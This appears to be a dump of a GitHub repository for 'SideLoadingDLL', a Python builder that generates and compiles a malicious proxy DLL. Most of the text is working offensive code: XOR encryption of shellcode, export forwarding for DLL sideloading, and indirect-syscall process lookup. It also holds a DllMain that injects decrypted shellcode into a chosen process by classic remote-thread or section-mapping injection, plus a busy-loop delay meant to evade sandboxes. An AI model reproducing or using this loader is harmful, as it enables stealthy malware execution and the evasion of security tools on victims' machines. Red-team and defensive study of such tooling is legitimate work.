12 | dllmain.obj : warning LNK4104: export of symbol 'DllGetClassObject' should be PRIVATE
13 | dllmain.obj : warning LNK4104: export of symbol 'DllRegisterServer' should be PRIVATE
14 | dllmain.obj : warning LNK4104: export of symbol 'DllUnregisterServer' should be PRIVATE
15 | Creating library C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.lib and object C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.exp
16 | Generating code
17 | All 13 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
18 | Finished generating code
19 | SideLoadingDLL.vcxproj -> C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.dll
20 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.read.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.read.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.write.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/SideLoadingDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22000.0:
2 | Release|x64|C:\Users\MaorPT\Desktop\Github\SideLoadingDLL\SideLoadingDLL\|
3 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/dllmain.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.Build.CppClean.log:
--------------------------------------------------------------------------------
/get_exports.py:
--------------------------------------------------------------------------------
import sys
import pefile

def proxyFunctions(targetDLL):
    targetDLL = targetDLL.replace("\\", "/") if "\\" in targetDLL else targetDLL

    # If the DLL lives in the system32 directory, don't make a copy; just point the proxy DLL at the original
    if targetDLL.lower().startswith("c:/windows/system32"):

        pe = pefile.PE(targetDLL)
        dll = targetDLL.replace("/", "\\\\").split(".dll")[0]
        d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
        pe.parse_data_directories(directories=d)
        exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
        pragma_list = []

        for e in exports:
            pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))

        return pragma_list


def main():
    if len(sys.argv) != 2:
        print("Usage main.py ")
        exit(1)
    print(proxyFunctions(sys.argv[1]))


if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/make.py:
--------------------------------------------------------------------------------
import optparse
import sys
import os
import pefile

dllmain = """// dllmain.c : Defines the entry point for the DLL application.
#include "windows.h"
#include "Defines.h"
#include "RecycleGate.h"
#include "stdio.h"

#define STATUS_SUCCESS 0

extern void PrepareSyscall(DWORD dwSycallNr, PVOID dw64Gate);
extern DoSyscall();

pragma_functions_placeholder

char key[] = "xor_key_placeholder";


void XOR(char* data, size_t data_len, char* key, size_t key_len) {
    int j;

    j = 0;
    for (int i = 0; i < data_len; i++) {
        if (j == key_len - 1) j = 0;

        data[i] = data[i] ^ key[j];
        j++;
    }
}

void sleep()
{
    for (int i = 0; i <= 500000; i++)
    {
        for (int j = 2; j <= i / 2; j++)
        {
            if (i % j == 0)
            {
                break;
            }
        }
    }
}

HANDLE findTarget(char* target)
{
    NTSTATUS status;
    PVOID buffer;
    PSYSTEM_PROCESS_INFO spi;

    buffer = VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // We need to allocate a large buffer because the process list can be large.

    if (!buffer)
    {
        return -1;
    }

    spi = (PSYSTEM_PROCESS_INFO)buffer;

    Syscall sysNtQuerySystemInformation = { 0x00 };
    DWORD dwSuccess = FAIL;

    dwSuccess = getSyscall(0xaf0d30ec, &sysNtQuerySystemInformation);
    if (dwSuccess == FAIL)
        return 0x01;

    PrepareSyscall(sysNtQuerySystemInformation.dwSyscallNr, sysNtQuerySystemInformation.pRecycledGate);
    if (!NT_SUCCESS(status = DoSyscall(SystemProcessInformation, spi, 1024 * 1024, NULL)))
    {
        VirtualFree(buffer, 0, MEM_RELEASE);
        return -1;
    }

    while (spi->NextEntryOffset) // Loop over the list until we reach the last entry.
    {
        wchar_t pName[256];
        memset(pName, 0, sizeof(pName));
        WideCharToMultiByte(CP_ACP, 0, spi->ImageName.Buffer, spi->ImageName.Length, (LPSTR)pName, sizeof(pName), NULL, NULL);

        int result = my_strcmp(target, (char*)pName);
        if (!result) {
            HANDLE pid = (HANDLE)spi->ProcessId;
            VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
            return pid;
        }

        spi = (PSYSTEM_PROCESS_INFO)((LPBYTE)spi + spi->NextEntryOffset); // Calculate the address of the next entry.

    }
    VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
    return 0;
}


memcpy_placeholder


int ProxyFunction()
{
    HANDLE file = NULL;
    DWORD fileSize = NULL;
    DWORD bytesRead = NULL;
    LPVOID fileData = NULL;

    // Reading our encrypted shellcode
    file = CreateFileA("shellcode_file_placeholder", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE) {
        return 1;
    }
    fileSize = GetFileSize(file, NULL);
    fileData = HeapAlloc(GetProcessHeap(), 0, fileSize);
    ReadFile(file, fileData, fileSize, &bytesRead, NULL);
    unsigned char* shellcode = (unsigned char*)fileData;

    HANDLE Entry = findTarget("target_process_placeholder"); // Targeting the target_process_placeholder process
    Syscall sysZwOpenProcess = { 0x0 };
    NTSTATUS dwSuccess = FAIL;
    HANDLE hProc = 0;

    dwSuccess = getSyscall(0xda1009c3, &sysZwOpenProcess);
    if (dwSuccess == FAIL)
        return 0x01;

    OBJECT_ATTRIBUTES oa;
    CLIENT_ID cid = { (HANDLE)Entry, NULL };
    InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
    PrepareSyscall(sysZwOpenProcess.dwSyscallNr, sysZwOpenProcess.pRecycledGate);
    DoSyscall(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);

    if (hProc != NULL)
    {
        technique_function_placeholder
    }
    return 0;
}


BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        ProxyFunction();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

"""

classic_injection = """Syscall sysNtAllocateVirtualMemory = { 0x0 };
Syscall sysNtWriteVirtualMemory = { 0x0 };
Syscall sysNtCreateThreadEx = { 0x0 };

DWORD dwSuccess = FAIL;
// Prepare the syscalls
dwSuccess = getSyscall(0x26d18008, &sysNtAllocateVirtualMemory);
if (dwSuccess == FAIL)
    return 0x01;
dwSuccess = getSyscall(0xd4b1e4d6, &sysNtWriteVirtualMemory);
if (dwSuccess == FAIL)
    return 0x01;
dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
if (dwSuccess == FAIL)
    return 0x01;
// Initializing the variables
HANDLE threadHandle = NULL;
LPVOID ds = NULL;
SIZE_T wr;
SIZE_T shellcodeSize = fileSize;

XOR((char*)shellcode, shellcodeSize, (char*)key, sizeof(key)); // Decrypting the shellcode

sleep(); // Own implementation of sleep function

PrepareSyscall(sysNtAllocateVirtualMemory.dwSyscallNr, sysNtAllocateVirtualMemory.pRecycledGate);
DoSyscall(hProc, &ds, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

PrepareSyscall(sysNtWriteVirtualMemory.dwSyscallNr, sysNtWriteVirtualMemory.pRecycledGate);
DoSyscall(hProc, ds, shellcode, shellcodeSize-1, &wr);

PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
DoSyscall(&threadHandle, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)ds, ds, FALSE, 0, 0, 0, NULL);"""

mapviewsection_injection = """Syscall sysZwCreateSection = { 0x0 };
Syscall sysNtMapViewOfSection = { 0x0 };
Syscall sysNtCreateThreadEx = { 0x0 };
Syscall sysNtResumeThread = { 0x0 };
Syscall sysNtDelayExeuction = { 0x0 };

DWORD dwSuccess = FAIL;
// Prepare the syscalls
dwSuccess = getSyscall(0x6805b1fb, &sysZwCreateSection);
if (dwSuccess == FAIL)
    return 0x01;

dwSuccess = getSyscall(0x625d5a2e, &sysNtMapViewOfSection);
if (dwSuccess == FAIL)
    return 0x01;

dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
if (dwSuccess == FAIL)
    return 0x01;

dwSuccess = getSyscall(0x6d397e74, &sysNtResumeThread);
if (dwSuccess == FAIL)
    return 0x01;

SIZE_T shellcodeSize = fileSize;
HANDLE hSection = NULL;
NTSTATUS status = NULL;
SIZE_T size = fileSize;
LARGE_INTEGER sectionSize = { size };
PVOID pLocalView = NULL, pRemoteView = NULL;
int viewUnMap = 2;

XOR((char*)shellcode, shellcodeSize, key, sizeof(key));

PrepareSyscall(sysZwCreateSection.dwSyscallNr, sysZwCreateSection.pRecycledGate);
if ((status = DoSyscall(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
    return -1;
}


PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
if ((status = DoSyscall(hSection, GetCurrentProcess(),
    &pLocalView, NULL, NULL, NULL,
    (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
    return -1;
}


VxMoveMemory(pLocalView, shellcode, shellcodeSize);

PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
if ((status = DoSyscall(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
    (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
    return -1;
}


HANDLE hHostThread = INVALID_HANDLE_VALUE;
PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
if (( status = DoSyscall(&hHostThread, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)pRemoteView, pRemoteView, FALSE, 0, 0, 0, NULL)) != STATUS_SUCCESS)
{
    return -1;
}

PrepareSyscall(sysNtResumeThread.dwSyscallNr, sysNtResumeThread.pRecycledGate);
DoSyscall(hHostThread);"""

memcopy_function = """PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
    char* d = (char*)dest;
    char* s = (char*)src;
    if (d < s)
        while (len--)
            *d++ = *s++;
    else {
        char* lasts = s + (len - 1);
        char* lastd = d + (len - 1);
        while (len--)
            *lastd-- = *lasts--;
    }
    return dest;
}"""

def logBanner():
    banner = r"""
__ _ _ __ _ _ ___ __ __
/ _(_) __| | ___ / / ___ __ _ __| (_)_ __ __ _ / \/ / / /
\ \| |/ _` |/ _ \/ / / _ \ / _` |/ _` | | '_ \ / _` | / /\ / / / /
_\ \ | (_| | __/ /__| (_) | (_| | (_| | | | | | (_| |/ /_// /___/ /___
\__/_|\__,_|\___\____/\___/ \__,_|\__,_|_|_| |_|\__, /___,'\____/\____/
|___/

SideLoadingDLL! Made by MaorSabag!! v1.1

"""
    print(banner)

def xor(data, key):
    key = str(key)
    l = len(key)
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        try:
            output_str += chr(current ^ ord(current_key))
        except:
            output_str += chr(ord(current) ^ ord(current_key))

    return output_str

def encryptShellcode(raw_shellcode, output_filename, KEY):
    plaintext = open(raw_shellcode, "rb").read()
    ciphertext = xor(plaintext, KEY)
    hex_cipher = '\\x' + '\\x'.join(hex(ord(x))[2:].zfill(2) for x in ciphertext) + ''

    python_file = """a=b"replace_me";h=open("name_replace", "wb");h.write(a);h.close()""".replace(r"replace_me", hex_cipher).replace(r"name_replace", output_filename) # For real I couldn't make the xor encryption work in any other way....

    exec(python_file)


def proxyFunctions(targetDLL):
    targetDLL = targetDLL.replace("\\", "/") if "\\" in targetDLL else targetDLL

    # If the DLL lives in the system32 directory, don't make a copy; just point the proxy DLL at the original
    if targetDLL.lower().startswith("c:/windows/system32"):

        pe = pefile.PE(targetDLL)
        dll = targetDLL.replace("/", "\\\\").split(".dll")[0]
        d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
        pe.parse_data_directories(directories=d)
        exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
        pragma_list = []

        for e in exports:
            pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))

        return pragma_list

    # If the DLL is in a local directory, make a copy and proxy to it
    else:
        pe = pefile.PE(targetDLL)
        dll = targetDLL.strip(".dll") + "_origin"
        os.system(f"copy {targetDLL} Output/{dll}.dll")
        d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
        pe.parse_data_directories(directories=d)
        exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
        pragma_list = []

        for e in exports:
            pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))

        return pragma_list


def main():
    global dllmain
    logBanner()
    parser = optparse.OptionParser(usage="Usage {} [-k | --key= XOR key] [-f | --file= Shellcode File] [-o | --output= output file name] [-t | --target= Target Process] [-d | --dll= DLL to proxy ] [ -m | --method= shellcode execution (Options: classic, mapview) ]".format(sys.argv[0]), version="{} 1.0".format(sys.argv[0]))
    parser.add_option('-k', '--key=', dest='xorKey', type='string', help='Specify the KEY for XOR encryption/Decryption')
    parser.add_option('-f', '--file=', dest='shellcodeFile', type='string', help='Specify the shellcode file')
    parser.add_option('-o', '--output=', dest='outputFilename', type='string', help='Specify the output filename')
    parser.add_option('-t', '--target=', dest='targetProcess', type='string', help='Specify the target process to inject the shellcode')
    parser.add_option('-d', '--dll=', dest='targetDLL', type='string', help='Specify the DLL for sideloading')
    parser.add_option('-m', '--method=', dest='method', type='string', help='Specify the method for shellcode execution (Options: classic, mapview)')
    (options, args) = parser.parse_args()
    if (options.xorKey == None) or (options.shellcodeFile == None) or (options.outputFilename == None) or (options.targetProcess == None) or (options.targetDLL == None):
        print(parser.usage)
        exit(0)
    else:
        xorKey = options.xorKey
        shellcodeFile = options.shellcodeFile
        outputFilename = options.outputFilename
        targetProcess = options.targetProcess
        targetDLL = options.targetDLL
        method = "classic" if options.method is None else options.method
        if method.lower() not in ["classic", "mapview"]:
            print(parser.usage)
            exit(0)

    print(f"[+] Encrypting the shellcode using xor with the key {xorKey}")
    encryptShellcode(shellcodeFile, outputFilename, xorKey)

    print(f"[+] Generating pragma header for proxy DLL {targetDLL}")
    pragma_list = '\n'.join(proxyFunctions(targetDLL))

    if method.lower() == "classic":
        dllmain = dllmain.replace(r"memcpy_placeholder", "").replace(r"technique_function_placeholder", classic_injection)
    elif method.lower() == "mapview":
        dllmain = dllmain.replace(r"memcpy_placeholder", memcopy_function).replace(r"technique_function_placeholder", mapviewsection_injection)
    else:
        print("Error occur.. try again")
        exit(0)


    print("[+] Making the dllmain file")
    dllmain = dllmain.replace(r"pragma_functions_placeholder", pragma_list).replace(r"xor_key_placeholder", xorKey).replace(r"shellcode_file_placeholder", outputFilename).replace(r"target_process_placeholder", targetProcess)

    with open("./SideLoadingDLL/SideLoadingDLL/dllmain.c", "w") as h:
        h.write(dllmain)

    print("[+] Compiling DLL")
    os.system('msbuild /nologo /verbosity:quiet /consoleloggerparameters:ErrorsOnly ./SideLoadingDLL/SideLoadingDLL.sln /t:Rebuild /p:Configuration=Release /p:Platform="x64"')

    if not os.path.exists('Output'):
        os.makedirs('Output')
    print("[+] Moving everything to Output directory")
    os.system(f"move .\\SideLoadingDLL\\x64\\Release\\SideLoadingDLL.dll .\\Output\\{targetDLL.split('/')[-1]} && move {outputFilename} Output/{outputFilename}")

if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------